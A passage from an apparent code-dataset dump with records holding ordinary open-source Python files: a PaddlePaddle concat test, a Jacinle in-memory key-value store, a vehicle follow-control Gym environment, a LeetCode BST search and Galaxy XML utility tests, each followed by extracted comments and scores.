        np_out1 = np.concatenate([in1, in2, in3], axis=-1)
        np_out2 = np.concatenate([in1, in2], axis=0)
        # Restore static mode so later tests are unaffected.
        paddle.enable_static()
        self.assertEqual((out1.numpy() == np_out1).all(), True)
        self.assertEqual((out2.numpy() == np_out2).all(), True)

    def test_eager(self):
        """Re-run the API tests under the eager (dygraph) execution guard."""
        with _test_eager_guard():
            self.test_api()
            self.test_fluid_api()
            self.test_imperative()

    def test_errors(self):
        """Invalid items, dtypes and axis types passed to concat must raise TypeError."""
        with program_guard(Program(), Program()):
            # The item in input must be Variable.
            x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
                                         fluid.CPUPlace())
            self.assertRaises(TypeError, paddle.concat, [x2])
            # The input dtype of concat_op must be float16, float32, float64, int32, int64.
            x4 = paddle.fluid.data(shape=[4], dtype='uint8', name='x4')
            x5 = paddle.fluid.data(shape=[4], dtype='uint8', name='x5')
            self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
            # The type of axis in concat_op should be int or Variable.
            x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
            x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
            x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')

            def test_axis_type():
                paddle.concat([x6, x7], 3.2)

            self.assertRaises(TypeError, test_axis_type)

            def test_input_same_dtype():
                # Mixed float16/float32 inputs are rejected.
                paddle.concat([x7, x8])

            self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPIWithLoDTensorArray(unittest.TestCase):
    """
    Test concat api when the input(x) is a LoDTensorArray.
    """

    def setUp(self):
        # Concatenate self.iter_num copies of self.x along self.axis.
        self.axis = 1
        self.python = paddle.concat
        self.iter_num = 3
        self.input_shape = [2, 3]
        self.x = np.random.random(self.input_shape).astype("float32")
        self.place = fluid.CUDAPlace(0) \
            if fluid.is_compiled_with_cuda() else fluid.CPUPlace()

    def set_program(self, use_fluid_api):
        """Build a static program that writes self.x into a tensor array
        self.iter_num times and concatenates the array along self.axis."""
        paddle.enable_static()
        if use_fluid_api:
            self.program = fluid.Program()
            with fluid.program_guard(self.program):
                input = fluid.layers.assign(self.x)
                tensor_array = fluid.layers.create_array(dtype='float32')
                zero = fluid.layers.fill_constant(shape=[1],
                                                  value=0,
                                                  dtype="int64")
                for i in range(self.iter_num):
                    fluid.layers.array_write(input, zero + i, tensor_array)
                self.out_var = fluid.layers.concat(tensor_array, axis=self.axis)
        else:
            self.program = paddle.static.Program()
            with paddle.static.program_guard(self.program):
                input = paddle.assign(self.x)
                tensor_array = fluid.layers.create_array(
                    dtype='float32'
                )  # Api create_array is not supported in paddle 2.0 yet.
                zero = paddle.zeros(shape=[1], dtype="int64")
                for i in range(self.iter_num):
                    # Api array_write is not supported in paddle 2.0 yet.
                    fluid.layers.array_write(input, zero + i, tensor_array)
                self.out_var = paddle.concat(tensor_array, axis=self.axis)

    def test_fluid_api(self):
        self._run_static_mode(use_fluid_api=True)

    def test_paddle_api(self):
        self._run_static_mode(use_fluid_api=False)

    def _run_static_mode(self, use_fluid_api):
        self.set_program(use_fluid_api)
        # Concat over a tensor array has an unknown (-1) extent on the axis.
        self.assertTrue(self.out_var.shape[self.axis] == -1)
        exe = fluid.Executor(self.place)
        res = exe.run(self.program, fetch_list=self.out_var)
        self.assertTrue(
            np.array_equal(
                res[0], np.concatenate([self.x] * self.iter_num,
                                       axis=self.axis)))


if __name__ == '__main__':
    unittest.main()
|
en
| 0.744374
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #17015." #----------------Concat Fp16---------------- #----------------Concat Bf16---------------- # The input type of concat_op should be list. # The item in input must be Variable. # The input dtype of concat_op must be float16, float32, float64, int32, int64. # The type of axis in concat_op should be int or Variable. # The item in input must be Variable. # The input dtype of concat_op must be float16, float32, float64, int32, int64. # The type of axis in concat_op should be int or Variable. Test concat api when the input(x) is a LoDTensorArray. # Api create_array is not supported in paddle 2.0 yet. # Api array_write is not supported in paddle 2.0 yet.
| 2.103484
| 2
|
jacinle/storage/kv/mem.py
|
dapatil211/Jacinle
| 114
|
6627567
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : mem.py
# Author : <NAME>
# Email : <EMAIL>
# Date : 01/19/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from .kv import KVStoreBase
class MemKVStore(KVStoreBase):
    """Volatile key-value store that keeps everything in a process-local dict."""

    def __init__(self, readonly=False):
        super().__init__(readonly=readonly)
        # Backing storage for all key-value pairs.
        self._store = {}

    def _has(self, key):
        return key in self._store

    def _get(self, key, default):
        return self._store.get(key, default)

    def _put(self, key, value, replace):
        if replace:
            self._store[key] = value
        else:
            # Keep the existing value when overwriting is not requested.
            self._store.setdefault(key, value)

    def _erase(self, key):
        # Removes and returns the value; raises KeyError if the key is absent.
        return self._store.pop(key)

    def _keys(self):
        return self._store.keys()
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : mem.py
# Author : <NAME>
# Email : <EMAIL>
# Date : 01/19/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from .kv import KVStoreBase
class MemKVStore(KVStoreBase):
    """In-memory key-value store; data lives in a dict and is not persisted."""

    def __init__(self, readonly=False):
        super().__init__(readonly=readonly)
        # Backing storage for all key-value pairs.
        self._store = dict()

    def _has(self, key):
        return key in self._store

    def _get(self, key, default):
        return self._store.get(key, default)

    def _put(self, key, value, replace):
        if not replace:
            # Preserve an existing value when replacement is not requested.
            self._store.setdefault(key, value)
        else:
            self._store[key] = value

    def _erase(self, key):
        # Removes and returns the value; raises KeyError if the key is absent.
        return self._store.pop(key)

    def _keys(self):
        return self._store.keys()
|
en
| 0.571194
|
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # File : mem.py # Author : <NAME> # Email : <EMAIL> # Date : 01/19/2018 # # This file is part of Jacinle. # Distributed under terms of the MIT license.
| 2.367586
| 2
|
AccFocEnv/AccFocEnv.py
|
mbroso/constraintnet_foc
| 0
|
6627568
|
<filename>AccFocEnv/AccFocEnv.py
"""This module implements a simulated follow object control environment following OpenAI Gym interface.
"""
import math
import numpy as np
import gym
from gym import error, spaces
from gym.utils import seeding
import matplotlib.pyplot as plt
import time
from tqdm import tqdm
from pathlib import Path
from . import traffic_scenarios
from . import vehicle_longitudinal_model
from . import reward_functions
from . import acceleration_constraints
class AccFocEnv(gym.Env):
    """Custom environment for follow object control that follows OpenAI gym interface"""
    metadata = {'render.modes': ['episode']}

    def __init__(self, opts, plotter=None):
        """Initialize environment

        Args:
            opts: Namespace object with options.
            plotter: Plotter object to enable plotting of each episode.
        """
        self.opts = opts
        # Environment parameters: the agent acts every env_dt while the
        # physics simulation runs at the finer sim_dt.
        self.dt = opts.env_dt
        self.phys_dt = opts.sim_dt
        # store plotter for plotting of episodes
        self.plotter = plotter
        # Configure timing: number of physics sub-steps per agent step.
        self.pyhs_steps_subsample = round(self.dt / self.phys_dt)
        assert self.dt >= self.phys_dt and self.pyhs_steps_subsample == self.dt / self.phys_dt, \
            "AccFocEnv: Intervals for train and pyhsics simulation don't match! env_dt has to be a multiple of sim_dt"
        self._max_episode_steps = round(opts.env_stop_time / self.dt)
        # Define action space (scalar acceleration demand). Define observation space.
        self.action_space = spaces.Box(low=opts.vehicle_a_min, high=opts.vehicle_a_max, shape=(1,), dtype=np.float32)
        self.observation_space = spaces.Box(-np.inf, np.inf, shape=(len(self.opts.observations),), dtype=np.float32)
        # Create ego car object. Initial position and velocity will be set by traffic scenario.
        self.ego_car = vehicle_longitudinal_model.my_vehicle_model(
            opts=opts, dt=self.phys_dt
        )
        # Environment including lead car from chosen traffic scenario.
        self.environment = traffic_scenarios.my_scenario(opts=opts, dt=self.phys_dt, ego_car=self.ego_car)
        # Reward function specified by options.
        self.reward_function = reward_functions.my_reward_function(opts=opts)
        # Load specified constraints.
        self.constraints = acceleration_constraints.AccelerationConstraints(self.opts)

    def seed(self, seed=None):
        """Seeds the whole environment.

        Args:
            seed: Random seed.

        Returns:
            Random seed.
        """
        self.np_random, seed = seeding.np_random(seed)
        self.action_space.seed(seed)
        self.environment.seed(seed)
        return [seed]

    def reset(self):
        """Resets environment, traffic scenario and variables

        Returns:
            Initial state.
        """
        # Reset internal values and environment
        self.environment.reset()
        # self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario
        self.t = 0.0
        self.steps = 0
        self.last_a_dem = 0
        self.last_a_ego = 0
        # Sentinel: -1 marks "no previous headway" for the first step.
        self.last_Hw = -1
        self.last_a_min = -0.1
        self.last_a_max = 0.1
        # Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten.
        if not hasattr(self, "data_store"):
            self.data_store = {}
        return self.step([0])[0]  # Return only state

    def step(self, action):
        """Simulates one environment step

        Args:
            action: List of chosen action.

        Returns:
            OpenAI Gym compatible return: Dict containing (observations, reward, done, debug_infos)
        """
        # Get desired acceleration and check system boundaries.
        a_dem = action[0]
        assert self.opts.vehicle_a_min <= a_dem <= self.opts.vehicle_a_max, f"Action {a_dem} m/s² not part of action space!"
        # Clip a_dem according to constraints when specified in opts
        if self.opts.clip_a_dem == True:
            a_dem = np.clip(a_dem, self.last_a_min, self.last_a_max)
        # Simulate next timesteps of environment and ego_car.
        for i in range(self.pyhs_steps_subsample):
            a_tar, v_tar, x_tar, scenario_done = self.environment.step(self.t + self.phys_dt * i)
            a_ego, v_ego, x_ego = self.ego_car.step(a_dem)
        # Calculate correction velocity to increase distance in Stop&Go scenario.
        v_correction = 0
        if v_ego < self.opts.stop_n_go_velocity:
            v_correction = self.opts.stop_n_go_distance / self.opts.desired_headway * (self.opts.stop_n_go_velocity - v_ego) / self.opts.stop_n_go_velocity
        # Calculate and clip headway and its derivative.
        Hw = (x_tar - x_ego) / max(0.001, v_ego + v_correction)
        dHw = (Hw - self.last_Hw) / self.dt
        if self.last_Hw == -1:
            dHw = 0  # Prevent initial value from being too big
        self.last_Hw = Hw
        Hw = max(0, min(10.01, Hw))
        dHw = max(-0.75, min(0.75, dHw))
        # Calculate safe distance. Increase distance for Stop&Go scenario.
        safe_distance = self.opts.desired_headway * abs(v_ego)
        if v_ego < self.opts.stop_n_go_velocity:
            safe_distance += self.opts.stop_n_go_distance * (1 - max(0, v_ego) / self.opts.stop_n_go_velocity)
        # All variables in this dict can be used as observation, in the reward function or can be plotted.
        state = {
            # Time and raw commanded acceleration by agent.
            't': self.t,
            'a_dem': a_dem,
            # Ego vehicle.
            'a_ego': a_ego,
            'v_ego': v_ego,
            'x_ego': x_ego,
            'j_ego': (a_ego - self.last_a_ego) / self.dt,
            # Target vehicle.
            'a_tar': a_tar,
            'v_tar': v_tar,
            'x_tar': x_tar,
            # Relative values.
            'a_rel': a_tar - a_ego,
            'v_rel': v_tar - v_ego,
            'x_rel': x_tar - x_ego,
            # Control setpoints.
            'd_safe': safe_distance,
            'd_err': safe_distance - (x_tar - x_ego),
            'Hw': Hw,
            'dHw': dHw,
            'v_err': v_tar - v_ego,
            # misc
            'last_a_dem': self.last_a_dem,
            'last_a_ego': self.last_a_ego,
        }
        # Calculate upper and lower constraint for acceleration and add to state.
        state["a_min"], state["a_max"] = self.constraints.calculate(state)
        # End episode if ego car crashed into the lead car or drives backwards fast.
        # done signal:
        #   done = 0: not done, episode can continue
        #   done = 1: done, because simulated time ended
        #   done = 2: done, because agent ended in terminal step (e.g. crash)
        done = 1 if scenario_done or (self.steps >= self._max_episode_steps - 1) else 0
        done = 2 if (x_tar - x_ego) < -50 or v_ego < -5 else done
        state["done"] = done
        # Calculate reward and add to state.
        reward = self.reward_function(state, self.opts)
        state["reward"] = reward
        # Store state values in buffer for later plotting.
        if self.steps < self._max_episode_steps:
            # Store all state variables in data_store.
            for k, v in state.items():
                if k not in self.data_store:
                    self.data_store[k] = np.zeros(self._max_episode_steps)
                self.data_store[k][self.steps] = v
            # Add chosen action to previous timestep in state dict.
            if self.steps >= 1:
                self.data_store["a_dem"][self.steps - 1] = a_dem
        # Extract observations from state dict.
        obs = [state[key] for key in self.opts.observations]
        # Increment counter and time. Store last values.
        self.steps += 1
        self.t += self.dt
        self.last_a_dem = a_dem
        self.last_a_ego = a_ego
        self.last_a_min = state["a_min"]
        self.last_a_max = state["a_max"]
        # OpenAI Gym compatible return: (observations, reward, done, debug_infos)
        return np.array(obs, dtype=np.float32), reward, done, {}

    def render(self, mode='human', close=False):
        """Live rendering not supported. See render_episode()"""
        pass

    def render_episode(self, prefix=""):
        """Render a complete episode at its end using the plotter in a separate thread.
        """
        if self.plotter is None:
            return
        self.plotter.plot([self.data_store, self.steps, prefix])

    def calc_metrics(self):
        """Calculate metrics at the end of an episode.

        Returns:
            Dict with keys:
                safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
                discomfort: Metric measuring discomfort. Lower values are better.
                tracking_error: Metric measuring tracking error. Lower values are better.
        """
        safety = min(1, np.min(self.data_store["Hw"][0:self.steps]) / self.opts.desired_headway)
        # Discomfort mixes mean squared acceleration and mean squared jerk.
        discomfort = np.mean(self.data_store["a_ego"][0:self.steps]**2) + 0.5 * np.mean(self.data_store["j_ego"][0:self.steps]**2)
        tracking_error = np.mean((self.data_store["Hw"][0:self.steps] - self.opts.desired_headway)**2)
        # Cap the tracking error so a single bad episode cannot dominate averages.
        tracking_error = min(9, tracking_error)
        return {"safety": safety, "discomfort": discomfort, "tracking_error": tracking_error}
|
<filename>AccFocEnv/AccFocEnv.py
"""This module implements a simulated follow object control environment following OpenAI Gym interface.
"""
import math
import numpy as np
import gym
from gym import error, spaces
from gym.utils import seeding
import matplotlib.pyplot as plt
import time
from tqdm import tqdm
from pathlib import Path
from . import traffic_scenarios
from . import vehicle_longitudinal_model
from . import reward_functions
from . import acceleration_constraints
class AccFocEnv(gym.Env):
"""Custom environment for follow object control that follows OpenAI gym interface"""
metadata = {'render.modes': ['episode']}
def __init__(self, opts, plotter=None):
"""Initialize environment
Args:
opts: Namespace object with options.
plotter: Plotter object to enable plotting of each episode.
"""
self.opts = opts
# Environment parameters
self.dt = opts.env_dt
self.phys_dt = opts.sim_dt
# store plotter for plotting of episodes
self.plotter = plotter
# Configure timing
self.pyhs_steps_subsample = round(self.dt / self.phys_dt)
assert self.dt >= self.phys_dt and self.pyhs_steps_subsample == self.dt / self.phys_dt, \
"AccFocEnv: Intervals for train and pyhsics simulation don't match! env_dt has to be a multiple of sim_dt"
self._max_episode_steps = round(opts.env_stop_time / self.dt)
# Define action space. Define observation space.
self.action_space = spaces.Box(low=opts.vehicle_a_min, high=opts.vehicle_a_max, shape=(1,), dtype=np.float32)
self.observation_space = spaces.Box(-np.inf, np.inf, shape=(len(self.opts.observations),), dtype=np.float32)
# Create ego car object. Initial position and velocity will be set by traffic scenario.
self.ego_car = vehicle_longitudinal_model.my_vehicle_model(
opts=opts, dt=self.phys_dt
)
# Environment including lead car from choosen traffic scenario.
self.environment = traffic_scenarios.my_scenario(opts=opts, dt=self.phys_dt, ego_car=self.ego_car)
# Reward function specified by options.
self.reward_function = reward_functions.my_reward_function(opts=opts)
# Load specified costraints.
self.constraints = acceleration_constraints.AccelerationConstraints(self.opts)
def seed(self, seed=None):
"""Seeds the whole environment.
Args:
seed: Random seed.
Returns:
Random seed.
"""
self.np_random, seed = seeding.np_random(seed)
self.action_space.seed(seed)
self.environment.seed(seed)
return [seed]
def reset(self):
"""Resets environment, traffic scenario and variables
Returns:
Initial state.
"""
# Reset internal values and environment
self.environment.reset()
# self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario
self.t = 0.0
self.steps = 0
self.last_a_dem = 0
self.last_a_ego = 0
self.last_Hw = -1
self.last_a_min = -0.1
self.last_a_max = 0.1
# Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten.
if not hasattr(self, "data_store"):
self.data_store = {}
return self.step([0])[0] # Return only state
    def step(self, action):
        """Simulate one environment step of length ``self.dt``.

        Runs ``self.pyhs_steps_subsample`` physics sub-steps, derives the
        headway-based state, computes reward/done, and buffers everything
        for later plotting.

        Args:
            action: Single-element list with the demanded acceleration [m/s²].

        Returns:
            OpenAI Gym compatible tuple (observations, reward, done, info).
            done is 0 (continue), 1 (time limit / scenario end) or
            2 (terminal event, e.g. crash).
        """
        # Get desired acceleration and check system boundaries.
        a_dem = action[0]
        assert self.opts.vehicle_a_min <= a_dem <= self.opts.vehicle_a_max, f"Action {a_dem} m/s² not part of action space!"
        # Clip a_dem to the constraints from the PREVIOUS step when enabled.
        if self.opts.clip_a_dem == True:
            a_dem = np.clip(a_dem, self.last_a_min, self.last_a_max)
        # Simulate the physics sub-steps; a_dem is held constant across them.
        # NOTE(review): only the values from the last sub-step are used below,
        # since all dt-level quantities are derived once per env step.
        for i in range(self.pyhs_steps_subsample):
            a_tar, v_tar, x_tar, scenario_done = self.environment.step(self.t + self.phys_dt * i)
            a_ego, v_ego, x_ego = self.ego_car.step(a_dem)
        # Correction velocity to enlarge the headway in the Stop&Go regime.
        v_correction = 0
        if v_ego < self.opts.stop_n_go_velocity:
            v_correction = self.opts.stop_n_go_distance / self.opts.desired_headway * (self.opts.stop_n_go_velocity - v_ego) / self.opts.stop_n_go_velocity
        # Headway (time gap) and its derivative; max(0.001, ...) avoids
        # division by zero at standstill.
        Hw = (x_tar - x_ego) / max(0.001, v_ego + v_correction)
        dHw = (Hw - self.last_Hw) / self.dt
        if self.last_Hw == -1:
            dHw = 0  # Sentinel from reset(): suppress the huge initial jump.
        self.last_Hw = Hw
        # Clip to the ranges the observation/reward design expects.
        Hw = max(0, min(10.01, Hw))
        dHw = max(-0.75, min(0.75, dHw))
        # Safe distance; extended by a standstill offset in the Stop&Go regime.
        safe_distance = self.opts.desired_headway * abs(v_ego)
        if v_ego < self.opts.stop_n_go_velocity:
            safe_distance += self.opts.stop_n_go_distance * (1 - max(0, v_ego) / self.opts.stop_n_go_velocity)
        # Every key here can serve as observation, reward input or plot signal.
        state = {
            # Time and raw commanded acceleration by agent.
            't': self.t,
            'a_dem': a_dem,
            # Ego vehicle.
            'a_ego': a_ego,
            'v_ego': v_ego,
            'x_ego': x_ego,
            'j_ego': (a_ego - self.last_a_ego) / self.dt,  # jerk estimate
            # Target (lead) vehicle.
            'a_tar': a_tar,
            'v_tar': v_tar,
            'x_tar': x_tar,
            # Relative values.
            'a_rel': a_tar - a_ego,
            'v_rel': v_tar - v_ego,
            'x_rel': x_tar - x_ego,
            # Control setpoints.
            'd_safe': safe_distance,
            'd_err': safe_distance - (x_tar - x_ego),
            'Hw': Hw,
            'dHw': dHw,
            'v_err': v_tar - v_ego,
            # Values carried over from the previous env step.
            'last_a_dem': self.last_a_dem,
            'last_a_ego': self.last_a_ego,
        }
        # Upper and lower acceleration constraints for the NEXT action.
        state["a_min"], state["a_max"] = self.constraints.calculate(state)
        # done = 0: not done, episode can continue
        # done = 1: done, because simulated time / scenario ended
        # done = 2: done, terminal event (crash into lead or fast reversing)
        done = 1 if scenario_done or (self.steps >= self._max_episode_steps - 1) else 0
        done = 2 if (x_tar - x_ego) < -50 or v_ego < -5 else done
        state["done"] = done
        # Reward is computed on the fully assembled state.
        reward = self.reward_function(state, self.opts)
        state["reward"] = reward
        # Buffer all state values for later episode plotting.
        if self.steps < self._max_episode_steps:
            for k, v in state.items():
                if k not in self.data_store:
                    self.data_store[k] = np.zeros(self._max_episode_steps)
                self.data_store[k][self.steps] = v
            # Attribute the (possibly clipped) action to the previous step,
            # aligning commanded and realized accelerations in the plots.
            if self.steps >= 1:
                self.data_store["a_dem"][self.steps - 1] = a_dem
        # Extract the configured observation subset from the state dict.
        obs = [state[key] for key in self.opts.observations]
        # Increment counters and remember values needed next step.
        self.steps += 1
        self.t += self.dt
        self.last_a_dem = a_dem
        self.last_a_ego = a_ego
        self.last_a_min = state["a_min"]
        self.last_a_max = state["a_max"]
        # OpenAI Gym compatible return: (observations, reward, done, debug_infos)
        return np.array(obs, dtype=np.float32), reward, done, {}
def render(self, mode='human', close=False):
"""Live rendering not supported. See render_episode()"""
pass
def render_episode(self, prefix=""):
"""Render a complete episode at its end using the plotter in a seperate thread.
"""
if self.plotter is None:
return
self.plotter.plot([self.data_store, self.steps, prefix])
def calc_metrics(self):
"""Calculate metrics at the end of an episode.
Returns:
Dict with keys:
safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
discomfort: Metric measuring discomfort. Lower values are better.
tracking_error: Metric measuring tracking error. Lower values are better.
"""
safety = min(1, np.min(self.data_store["Hw"][0:self.steps]) / self.opts.desired_headway)
discomfort = np.mean(self.data_store["a_ego"][0:self.steps]**2) + 0.5 * np.mean(self.data_store["j_ego"][0:self.steps]**2)
tracking_error = np.mean((self.data_store["Hw"][0:self.steps] - self.opts.desired_headway)**2)
tracking_error = min(9, tracking_error)
return {"safety": safety, "discomfort": discomfort, "tracking_error": tracking_error}
|
en
| 0.797996
|
This module implements a simulated follow-object control environment following the OpenAI Gym interface. It defines a custom Gym-compatible environment for follow-object control and handles the environment's initialization.
Args:
opts: Namespace object with options.
plotter: Plotter object to enable plotting of each episode. # Environment parameters # store plotter for plotting of episodes # Configure timing # Define action space. Define observation space. # Create ego car object. Initial position and velocity will be set by traffic scenario. # Environment including lead car from choosen traffic scenario. # Reward function specified by options. # Load specified costraints. Seeds the whole environment.
Args:
seed: Random seed.
Returns:
Random seed. Resets environment, traffic scenario and variables
Returns:
Initial state. # Reset internal values and environment # self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario # Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten. # Return only state Simulates one environment step
Args:
action: List of chosen action.
Returns:
OpenAI Gym compatible return: Dict containing (observations, reward, done, debug_infos) # Get desired acceleration and check system boundaries. # Clip a_dem according to constraints when specified in opts # Simulate next timesteps of environment and ego_car. # Calucate correction velocity to increase distance in Stop&Go scenario. # Calulate and clip headway and its derivation. # Prevent inital value from being to big # Calculate safe distance. Increase distance for Stop&Go scenario. # All variables in this dict can be used as observation, in the reward function or can be plotted. # Time and raw commanded acceleration by agent. # Ego vehicle. # Target vehicle. # Relative values. # Control setpoints. # misc # Calculation upper and lower constraint for acceleration and add to state. # end episode of ego car crashed in the lead car or car goes backwards fast # done signal # done = 0: not done, episode can continue # done = 1: done, because simulated time ended # done = 2: done, because agent ended in terminal step (e.g. crash) # Calculate reward and add to state. # Store state values in buffer for later plotting. # Store all state variables in data_store. # Add choosen action to previous timestep in state dict. # Extract observations from state dict. # Increment counter and time. Store last values. # OpenAI Gym compatible return: (observations, reward, done, debug_infos) Live rendering not supported. See render_episode() Render a complete episode at its end using the plotter in a seperate thread. Calculate metrics at the end of an episode.
Returns:
Dict with keys:
safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
discomfort: Metric measuring discomfort. Lower values are better.
tracking_error: Metric measuring tracking error. Lower values are better.
| 2.617531
| 3
|
python/src/problem/leetcode/easy/leetcode_700.py
|
yipwinghong/Algorithm
| 9
|
6627569
|
<reponame>yipwinghong/Algorithm
# coding=utf-8
from src.data_structure.data_structure import TreeNode
class Solution:
    """LeetCode 700: Search in a Binary Search Tree.

    (The previous docstring, "另一个树的子树" / "Subtree of Another Tree",
    described LeetCode 572 and did not match this code.)
    """

    def search_bst(self, root: "TreeNode", val: int) -> "TreeNode":
        """Return the subtree rooted at the node whose value equals ``val``.

        Descends the tree using the BST ordering invariant, so each step
        discards one half of the remaining tree.

        Time: O(h) where h is the tree height, Space: O(1)
        :param root: Root of a binary search tree (may be None).
        :param val: Value to search for.
        :return: The matching node, or None if ``val`` is not present.
        """
        while root and root.val != val:
            # Go right when the current value is too small, left otherwise.
            root = root.right if root.val < val else root.left
        return root
|
# coding=utf-8
from src.data_structure.data_structure import TreeNode
class Solution:
"""
另一个树的子树
"""
def search_bst(self, root: TreeNode, val: int) -> TreeNode:
"""
Time: O(h), Space: O(1)
:param root:
:param val:
:return:
"""
while root and root.val != val:
root = root.right if root.val < val else root.left
return root
|
en
| 0.29398
|
# coding=utf-8 另一个树的子树 Time: O(h), Space: O(1) :param root: :param val: :return:
| 3.51216
| 4
|
test/unit/util/test_utils.py
|
Tomasz69/galaxy
| 1
|
6627570
|
<reponame>Tomasz69/galaxy
import errno
import os
import tempfile
import pytest
from galaxy import util
SECTION_XML = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>
toolshed.g2.bx.psu.edu
</tool_shed>
</tool>
</section>
"""
def test_strip_control_characters():
    """A NUL byte embedded in a string is removed."""
    assert util.strip_control_characters('\x00bla') == 'bla'
def test_strip_control_characters_nested():
    """Control characters are stripped inside lists, tuples and dicts."""
    dirty = '\x00bla'
    clean = 'bla'
    as_list = [dirty]
    as_tuple = (dirty, 'blub')
    as_dict = {42: dirty}
    assert util.strip_control_characters_nested(as_list)[0] == clean
    assert util.strip_control_characters_nested(as_tuple)[0] == clean
    assert util.strip_control_characters_nested(as_dict)[42] == clean
def test_parse_xml_string():
    """parse_xml_string yields the expected tool section element."""
    _verify_section(util.parse_xml_string(SECTION_XML))
def test_parse_xml_file():
    """parse_xml on an on-disk file yields the expected section element."""
    with tempfile.NamedTemporaryFile(mode='w') as handle:
        handle.write(SECTION_XML)
        handle.flush()  # ensure content is visible to the parser
        _verify_section(util.parse_xml(handle.name).getroot())
def _verify_section(section):
tool = next(iter(section))
assert sorted(tool.items()) == [
('file',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml'),
('guid',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5')
]
assert next(iter(tool)).text == 'toolshed.g2.bx.psu.edu'
def test_xml_to_string():
    """Non-pretty serialization produces a single line (no newlines)."""
    serialized = util.xml_to_string(util.parse_xml_string(SECTION_XML))
    assert '\n' not in serialized
def test_xml_to_string_pretty():
    """Pretty serialization matches the expected multi-line layout and
    collapses the whitespace-only text inside <tool_shed>."""
    section = util.parse_xml_string(SECTION_XML)
    s = util.xml_to_string(section, pretty=True)
    # Expected output; exact whitespace matters for the equality check below.
    # NOTE(review): leading indentation inside this literal may have been
    # lost in transport — verify against the actual xml_to_string output.
    PRETTY = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>toolshed.g2.bx.psu.edu</tool_shed>
</tool>
</section>"""
    assert s == PRETTY
def test_parse_xml_enoent():
    """parse_xml surfaces ENOENT when the target file does not exist."""
    # Create and immediately delete a temp file to obtain a path that is
    # guaranteed not to exist.
    handle, missing_path = tempfile.mkstemp()
    os.close(handle)
    os.remove(missing_path)
    with pytest.raises(IOError) as excinfo:
        util.parse_xml(missing_path)
    assert excinfo.value.errno == errno.ENOENT
|
import errno
import os
import tempfile
import pytest
from galaxy import util
SECTION_XML = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>
toolshed.g2.bx.psu.edu
</tool_shed>
</tool>
</section>
"""
def test_strip_control_characters():
s = '\x00bla'
assert util.strip_control_characters(s) == 'bla'
def test_strip_control_characters_nested():
s = '\x00bla'
stripped_s = 'bla'
l = [s]
t = (s, 'blub')
d = {42: s}
assert util.strip_control_characters_nested(l)[0] == stripped_s
assert util.strip_control_characters_nested(t)[0] == stripped_s
assert util.strip_control_characters_nested(d)[42] == stripped_s
def test_parse_xml_string():
section = util.parse_xml_string(SECTION_XML)
_verify_section(section)
def test_parse_xml_file():
with tempfile.NamedTemporaryFile(mode='w') as tmp:
tmp.write(SECTION_XML)
tmp.flush()
section = util.parse_xml(tmp.name).getroot()
_verify_section(section)
def _verify_section(section):
tool = next(iter(section))
assert sorted(tool.items()) == [
('file',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml'),
('guid',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5')
]
assert next(iter(tool)).text == 'toolshed.g2.bx.psu.edu'
def test_xml_to_string():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section)
assert len(s.split('\n')) == 1
def test_xml_to_string_pretty():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section, pretty=True)
PRETTY = """<?xml version="1.0" ?>
